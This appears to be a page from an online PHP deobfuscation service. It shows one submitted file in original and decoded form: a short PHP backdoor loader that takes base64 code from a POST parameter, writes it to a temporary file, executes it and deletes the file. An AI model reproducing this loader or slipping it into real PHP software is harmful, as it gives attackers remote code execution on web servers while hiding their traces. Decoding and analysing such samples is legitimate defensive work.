Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(E_ERROR);set_time_limit(0); if(isset($_POST['57943775227122989319..

Decoded Output download

<?php  
error_reporting(E_ERROR);set_time_limit(0); 
if(isset($_POST['5794377522712298931953'])){ 
	$tofile='407.php'; 
	$a =base64_decode(strtr($_POST['5794377522712298931953'], '-_,', '+/='));  
	$a='<?php '.$a.'?>'; 
	@file_put_contents($tofile,$a); 
	require_once('407.php'); 
	@unlink($tofile); 
	exit; 
 
} 
?>

Did this file decode correctly?

Original Code

<?php 
error_reporting(E_ERROR);set_time_limit(0);
if(isset($_POST['5794377522712298931953'])){
	$tofile='407.php';
	$a =base64_decode(strtr($_POST['5794377522712298931953'], '-_,', '+/=')); 
	$a='<?php '.$a.'?>';
	@file_put_contents($tofile,$a);
	require_once('407.php');
	@unlink($tofile);
	exit;

}
?>

Function Calls

None

Variables

None

Stats

MD5 cc25eb446b85d0101040ae5ffd367805
Eval Count 0
Decode Time 77 ms